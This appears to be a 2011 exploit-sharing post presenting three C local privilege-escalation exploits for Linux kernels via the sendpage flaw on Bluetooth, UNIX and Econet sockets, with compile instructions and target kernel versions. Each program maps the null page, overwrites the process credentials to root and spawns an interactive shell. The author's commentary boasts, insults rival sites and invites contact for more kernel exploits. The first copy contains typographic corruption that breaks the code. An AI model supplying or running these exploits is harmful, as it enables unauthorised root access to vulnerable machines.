
PF_UNIX sendpage() 2010 — 2.6.18.el5-dev / 2.6.18-164.el5xen / 2.6.X — depends on the socket family existing. This comes in 3 parts here: PF_UNIX, PF_ECONET and PF_BLUETOOTH Linux working local root exploits (.c)

Posted on 13th October 2011 in Codes, Exploits

Ok, 2 variants, since some idiot 1337sht.com people leaked things they don't yet even know how to make BEST use of, but anyhow.. here, some gifts… and one is special :< unf is going to be patched or is patched.. depends on what you also do, but mmap is a big trick; be sure to also remember the UNIX socket problem: it can mmap the null page, and it's workable with BSD ;) Yes it's patched, but only with the latest FreeBSD update.. hehe... nasty!

Code for the Bluetooth socket, with fixed mmap... a shitty old vuln which was not really leaked onto exploit places like 1337shit.com or whatever they call themselves... lamahs, I call them

/* Bluetooth Sendpage socket() local root exploit
 * Linux 2.6.18-128.el5
 * Linux 2.6.9-89.EL
 * Ubuntu 8.10 Linux 2.6.27
 *
 * For i386 & ppc compile with the command;
 * gcc -w -o exploit exploit.c
 *
 * For x86_64 kernel and ppc64 Compile as;
 * gcc -w -m64 -o exploit exploit.c
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/sendfile.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>

#if !defined(__always_inline)
#define __always_inline inline __attribute__((always_inline))
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long current_stack_pointer(void) {
    unsigned long sp;
    asm volatile ("movq %%rsp,%0; " : "=r" (sp));
    return sp;
}
#else
static __always_inline unsigned long current_stack_pointer(void) {
    unsigned long sp;
    asm volatile ("movl %%esp,%0" : "=r" (sp));
    return sp;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
static __always_inline unsigned long current_stack_pointer(void) {
    unsigned long sp;
    asm volatile ("mr %0,%%r1; " : "=r" (sp));
    return sp;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long current_task_struct(void) {
    unsigned long task_struct;
    asm volatile ("movq %%gs:(0),%0; " : "=r" (task_struct));
    return task_struct;
}
#else
#define TASK_RUNNING 0

static __always_inline unsigned long current_task_struct(void) {
    unsigned long task_struct, thread_info;
    thread_info = current_stack_pointer() & ~(4096 – 1);
    if (*(unsigned long *)thread_info >= 0xc0000000) {
    task_struct = *(unsigned long *)thread_info;
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    }
    task_struct = current_stack_pointer() & ~(8192 – 1);
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    thread_info = task_struct;
    task_struct = *(unsigned long *)thread_info;
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    return -1;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#define TASK_RUNNING 0

static __always_inline unsigned long current_task_struct(void) {
    unsigned long task_struct, thread_info;
#if defined(__LP64__)
    task_struct = current_stack_pointer() & ~(16384 – 1);
#else
    task_struct = current_stack_pointer() & ~(8192 – 1);
#endif
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    thread_info = task_struct;
    task_struct = *(unsigned long *)thread_info;
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    return -1;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
static unsigned long uid, gid;
static int change_cred(void) {
    unsigned int *task_struct;
    task_struct = (unsigned int *)current_task_struct();
    while (task_struct) {
    if (task_struct[0] == uid && task_struct[1] == uid && task_struct[2] == uid && task_struct[3] == uid &&
    task_struct[4] == gid && task_struct[5] == gid && task_struct[6] == gid && task_struct[7] == gid) {
    task_struct[0] = task_struct[1] = task_struct[2] = task_struct[3] = task_struct[4] = task_struct[5] =
    task_struct[6] = task_struct[7] = 0;
    break;
    }
    task_struct++;
    }
    return -1;
}
#elif defined(__powerpc__) || defined(__powerpc64__)
static int change_cred(void) {
    unsigned int *task_struct;
    task_struct = (unsigned int *)current_task_struct();
    while (task_struct) {
    if (!task_struct[0]) {
    task_struct++;
    continue;
    }
    if (task_struct[0] == task_struct[1] && task_struct[0] == task_struct[2] && task_struct[0] == task_struct[3] &&
    task_struct[4] == task_struct[5] && task_struct[4] == task_struct[6] && task_struct[4] == task_struct[7]) {
    task_struct[0] = task_struct[1] = task_struct[2] = task_struct[3] = task_struct[4] = task_struct[5] =
    task_struct[6] = task_struct[7] = 0;
    break;
    }
    task_struct++;
    }
    return -1;
}
#endif
#define PAGE_SIZE getpagesize()  /* use this in 2011! (xd) */

int main(void) {
    char *addr;
    int out_fd, in_fd;
    char template[] = "/tmp/tmp.XX";
#if defined(__i386__) || defined(__x86_64__)
    uid = getuid(), gid = getgid();
#endif
// ye dunno why the other idjits are still tryin to nullpage mmap..useless can do it easier like..
    if ((addr=mmap(0×0,PAGE_SIZE,PROT_EXEC|PROT_READ|PROT_WRITE,MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS,0,0))==MAP_FAILED) {
    perror("- mmap failed");
    exit(EXIT_FAILURE);
    }
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
    addr[0] = ‘\xff’;
    addr[1] = ‘\x24′;
    addr[2] = ‘\x25′;
    *(unsigned long *)&addr[3] = 8;
    *(unsigned long *)&addr[8] = (unsigned long)change_cred;
#else
    addr[0] = ‘\xff’;
    addr[1] = ‘\x25′;
    *(unsigned long *)&addr[2] = 8;
    *(unsigned long *)&addr[8] = (unsigned long)change_cred;
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#if defined(__LP64__)
    *(unsigned long *)&addr[0] = *(unsigned long *)change_cred;
#else
    addr[0] = ‘\x3f’;
    addr[1] = ‘\xe0′;
    *(unsigned short *)&addr[2] = (unsigned short)change_cred>>16;
    addr[4] = ‘\x63′;
    addr[5] = ‘\xff’;
    *(unsigned short *)&addr[6] = (unsigned short)change_cred;
    addr[8] = ‘\x7f’;
    addr[9] = ‘\xe9′;
    addr[10] = ‘\x03′;
    addr[11] = ‘\xa6′;
    addr[12] = ‘\x4e’;
    addr[13] = ‘\x80′;
    addr[14] = ‘\x04′;
    addr[15] = ‘\x20′;
#endif
#endif
    if ((out_fd = socket(PF_BLUETOOTH, SOCK_DGRAM, 0)) == -1) {
    perror("- socket");
    exit(EXIT_FAILURE);
    }
    if ((in_fd = mkstemp(template)) == -1) {
    perror("- mkstemp");
    exit(EXIT_FAILURE);
    }
    if(unlink(template) == -1) {
    perror("- unlink");
    exit(EXIT_FAILURE);
    }
    if (ftruncate(in_fd, PAGE_SIZE) == -1) {
    perror("- ftruncate");
    exit(EXIT_FAILURE);
    }
    sendfile(out_fd, in_fd, NULL, PAGE_SIZE);
    execl("/bin/sh", "sh", "-i", NULL);
    exit(EXIT_SUCCESS);
}

Code for PF_UNIX sendpage() socketx (my version):

/* UNIX socket() local root exploit (OS Portable version)
 * For i386 & ppc compile with the command;
 * gcc -w -o exploit exploit.c
 *
 * For x86_64 kernel and ppc64 Compile as;
 * gcc -w -m64 -o exploit exploit.c
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/sendfile.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>

#if !defined(__always_inline)
#define __always_inline inline __attribute__((always_inline))
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long current_stack_pointer(void) {
    unsigned long sp;
    asm volatile ("movq %%rsp,%0; " : "=r" (sp));
    return sp;
}
#else
static __always_inline unsigned long current_stack_pointer(void) {
    unsigned long sp;
    asm volatile ("movl %%esp,%0" : "=r" (sp));
    return sp;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
static __always_inline unsigned long current_stack_pointer(void) {
    unsigned long sp;
    asm volatile ("mr %0,%%r1; " : "=r" (sp));
    return sp;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long current_task_struct(void) {
    unsigned long task_struct;
    asm volatile ("movq %%gs:(0),%0; " : "=r" (task_struct));
    return task_struct;
}
#else
#define TASK_RUNNING 0
static __always_inline unsigned long current_task_struct(void) {
    unsigned long task_struct, thread_info;
    thread_info = current_stack_pointer() & ~(4096 - 1);
    if (*(unsigned long *)thread_info >= 0xc0000000) {
    task_struct = *(unsigned long *)thread_info;
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    }
    task_struct = current_stack_pointer() & ~(8192 - 1);
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    thread_info = task_struct;
    task_struct = *(unsigned long *)thread_info;
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    return -1;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#define TASK_RUNNING 0

static __always_inline unsigned long current_task_struct(void) {
    unsigned long task_struct, thread_info;
#if defined(__LP64__)
    task_struct = current_stack_pointer() & ~(16384 - 1);
#else
    task_struct = current_stack_pointer() & ~(8192 - 1);
#endif
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    thread_info = task_struct;
    task_struct = *(unsigned long *)thread_info;
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    return -1;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
static unsigned long uid, gid;
static int change_cred(void) {
    unsigned int *task_struct;
    task_struct = (unsigned int *)current_task_struct();
    while (task_struct) {
    if (task_struct[0] == uid && task_struct[1] == uid && task_struct[2] == uid && task_struct[3] == uid &&
    task_struct[4] == gid && task_struct[5] == gid && task_struct[6] == gid && task_struct[7] == gid) {
    task_struct[0] = task_struct[1] = task_struct[2] = task_struct[3] = task_struct[4] = task_struct[5] =
    task_struct[6] = task_struct[7] = 0;
    break;
    }
    task_struct++;
    }
    return -1;
}
#elif defined(__powerpc__) || defined(__powerpc64__)
static int change_cred(void) {
    unsigned int *task_struct;
    task_struct = (unsigned int *)current_task_struct();
    while (task_struct) {
    if (!task_struct[0]) {
    task_struct++;
    continue;
    }
    if (task_struct[0] == task_struct[1] && task_struct[0] == task_struct[2] && task_struct[0] == task_struct[3] &&
    task_struct[4] == task_struct[5] && task_struct[4] == task_struct[6] && task_struct[4] == task_struct[7]) {
    task_struct[0] = task_struct[1] = task_struct[2] = task_struct[3] = task_struct[4] = task_struct[5] =
    task_struct[6] = task_struct[7] = 0;
    break;
    }
    task_struct++;
    }
    return -1;
}
#endif
#define PAGE_SIZE getpagesize()

int main(void) {
    char *addr;
    int out_fd, in_fd;
    char template[] = "/tmp/tmp.XX";
#if defined(__i386__) || defined(__x86_64__)
    uid = getuid(), gid = getgid();
#endif
    if ((addr=mmap(0x0,PAGE_SIZE,PROT_EXEC|PROT_READ|PROT_WRITE,MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS,0,0))==MAP_FAILED) {
    perror("- mmap failed");
    exit(EXIT_FAILURE);
    }
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
    addr[0] = '\xff';
    addr[1] = '\x24';
    addr[2] = '\x25';
    *(unsigned long *)&addr[3] = 8;
    *(unsigned long *)&addr[8] = (unsigned long)change_cred;
#else
    addr[0] = '\xff';
    addr[1] = '\x25';
    *(unsigned long *)&addr[2] = 8;
    *(unsigned long *)&addr[8] = (unsigned long)change_cred;
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#if defined(__LP64__)
    *(unsigned long *)&addr[0] = *(unsigned long *)change_cred;
#else
    addr[0] = '\x3f';
    addr[1] = '\xe0';
    *(unsigned short *)&addr[2] = (unsigned short)change_cred>>16;
    addr[4] = '\x63';
    addr[5] = '\xff';
    *(unsigned short *)&addr[6] = (unsigned short)change_cred;
    addr[8] = '\x7f';
    addr[9] = '\xe9';
    addr[10] = '\x03';
    addr[11] = '\xa6';
    addr[12] = '\x4e';
    addr[13] = '\x80';
    addr[14] = '\x04';
    addr[15] = '\x20';
#endif
#endif
    if ((out_fd = socket(PF_UNIX, SOCK_DGRAM, 0)) == -1) {
    perror("- socket");
    exit(EXIT_FAILURE);
    }
    if ((in_fd = mkstemp(template)) == -1) {
    perror("- mkstemp");
    exit(EXIT_FAILURE);
    }
    if(unlink(template) == -1) {
    perror("- unlink");
    exit(EXIT_FAILURE);
    }
    if (ftruncate(in_fd, PAGE_SIZE) == -1) {
    perror("- ftruncate");
    exit(EXIT_FAILURE);
    }
    sendfile(out_fd, in_fd, NULL, PAGE_SIZE);
    execl("/bin/sh", "sh", "-i", NULL);
    exit(EXIT_SUCCESS);
}

NOTE: that can be added to BSD easily...

Finally, the Econet one, which is usually a fail but has worked on a few *select* 2011 (very nice) kernels.. and is proven.

/* PF_ECONET sendpage-raw local root exploit 2011
 * For i386 & ppc compile with the command;
 * gcc -w -o exploit exploit.c
 *
 * For x86_64 kernel and ppc64 Compile as;
 * gcc -w -m64 -o exploit exploit.c
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/sendfile.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>

#if !defined(__always_inline)
#define __always_inline inline __attribute__((always_inline))
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long current_stack_pointer(void) {
    unsigned long sp;
    asm volatile ("movq %%rsp,%0; " : "=r" (sp));
    return sp;
}
#else
static __always_inline unsigned long current_stack_pointer(void) {
    unsigned long sp;
    asm volatile ("movl %%esp,%0" : "=r" (sp));
    return sp;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
static __always_inline unsigned long current_stack_pointer(void) {
    unsigned long sp;
    asm volatile ("mr %0,%%r1; " : "=r" (sp));
    return sp;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long current_task_struct(void) {
    unsigned long task_struct;
    asm volatile ("movq %%gs:(0),%0; " : "=r" (task_struct));
    return task_struct;
}
#else
#define TASK_RUNNING 0
static __always_inline unsigned long current_task_struct(void) {
    unsigned long task_struct, thread_info;
    thread_info = current_stack_pointer() & ~(4096 - 1);
    if (*(unsigned long *)thread_info >= 0xc0000000) {
    task_struct = *(unsigned long *)thread_info;
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    }
    task_struct = current_stack_pointer() & ~(8192 - 1);
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    thread_info = task_struct;
    task_struct = *(unsigned long *)thread_info;
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    return -1;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#define TASK_RUNNING 0
static __always_inline unsigned long current_task_struct(void) {
    unsigned long task_struct, thread_info;
#if defined(__LP64__)
    task_struct = current_stack_pointer() & ~(16384 - 1);
#else
    task_struct = current_stack_pointer() & ~(8192 - 1);
#endif
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    thread_info = task_struct;
    task_struct = *(unsigned long *)thread_info;
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    return -1;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
static unsigned long uid, gid;
static int change_cred(void) {
    unsigned int *task_struct;
    task_struct = (unsigned int *)current_task_struct();
    while (task_struct) {
    if (task_struct[0] == uid && task_struct[1] == uid && task_struct[2] == uid && task_struct[3] == uid &&
    task_struct[4] == gid && task_struct[5] == gid && task_struct[6] == gid && task_struct[7] == gid) {
    task_struct[0] = task_struct[1] = task_struct[2] = task_struct[3] = task_struct[4] = task_struct[5] =
    task_struct[6] = task_struct[7] = 0;
    break;
    }
    task_struct++;
    }
    return -1;
}
#elif defined(__powerpc__) || defined(__powerpc64__)
static int change_cred(void) {
    unsigned int *task_struct;
    task_struct = (unsigned int *)current_task_struct();
    while (task_struct) {
    if (!task_struct[0]) {
    task_struct++;
    continue;
    }
    if (task_struct[0] == task_struct[1] && task_struct[0] == task_struct[2] && task_struct[0] == task_struct[3] &&
    task_struct[4] == task_struct[5] && task_struct[4] == task_struct[6] && task_struct[4] == task_struct[7]) {
    task_struct[0] = task_struct[1] = task_struct[2] = task_struct[3] = task_struct[4] = task_struct[5] =
    task_struct[6] = task_struct[7] = 0;
    break;
    }
    task_struct++;
    }
    return -1;
}
#endif
#define PAGE_SIZE getpagesize() // want 2011, then use this or 4096!

int main(void) {
    char *addr;
    int out_fd, in_fd;
    char template[] = "/tmp/tmp.XX";
#if defined(__i386__) || defined(__x86_64__)
    uid = getuid(), gid = getgid();
#endif
if((addr=mmap(0x0,PAGE_SIZE,PROT_EXEC|PROT_READ|PROT_WRITE,MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS,0,0))==MAP_FAILED) {
    perror("- mmap failed");
    exit(EXIT_FAILURE);
    }
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
    addr[0] = '\xff';
    addr[1] = '\x24';
    addr[2] = '\x25';
    *(unsigned long *)&addr[3] = 8;
    *(unsigned long *)&addr[8] = (unsigned long)change_cred;
#else
    addr[0] = '\xff';
    addr[1] = '\x25';
    *(unsigned long *)&addr[2] = 8;
    *(unsigned long *)&addr[8] = (unsigned long)change_cred;
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#if defined(__LP64__)
    *(unsigned long *)&addr[0] = *(unsigned long *)change_cred;
#else
    addr[0] = '\x3f';
    addr[1] = '\xe0';
    *(unsigned short *)&addr[2] = (unsigned short)change_cred>>16;
    addr[4] = '\x63';
    addr[5] = '\xff';
    *(unsigned short *)&addr[6] = (unsigned short)change_cred;
    addr[8] = '\x7f';
    addr[9] = '\xe9';
    addr[10] = '\x03';
    addr[11] = '\xa6';
    addr[12] = '\x4e';
    addr[13] = '\x80';
    addr[14] = '\x04';
    addr[15] = '\x20';
#endif
#endif
    if ((out_fd = socket(PF_ECONET,SOCK_RAW,0)) == -1) { //my baby
    perror("- socket");
    exit(EXIT_FAILURE);
    }
    if ((in_fd = mkstemp(template)) == -1) {
    perror("- mkstemp");
    exit(EXIT_FAILURE);
    }
    if(unlink(template) == -1) {
    perror("- unlink");
    exit(EXIT_FAILURE);
    }
    if (ftruncate(in_fd, PAGE_SIZE) == -1) {
    perror("- ftruncate");
    exit(EXIT_FAILURE);
    }
    sendfile(out_fd, in_fd, NULL, PAGE_SIZE);
    execl("/bin/sh", "sh", "-i", NULL);
    exit(EXIT_SUCCESS);
}

Again, enjoy the *right*-made stuff; not taking credit for it, but definitely fixing some things and adjusting some releases which now seem to be mostly forkbombs... I dislike that. Either release your privates, which may be ok for even ONE kernel, as I am — for sure after an OpenVZ kernel-local, and some kind of OpenVZ attacker in general.. if interested, email me here / PM, whatever.
I can be found on EFnet as xd-- in #haxnet, or on Undernet under the nickname xds in the #zombie channel.
I look forward to any new things; atm I can safely say that up to 2010 I have it covered in ONE neat setup of only 4 exploits.. which is ok.
So, I am trying to make a perfect BSD-Linux-x86_64-OpenVZ payload-style scanner; any influence is welcome..

Note: I notice this site has HUGE ranks, so if your stuff got here, you're damn lucky, buddy!
xd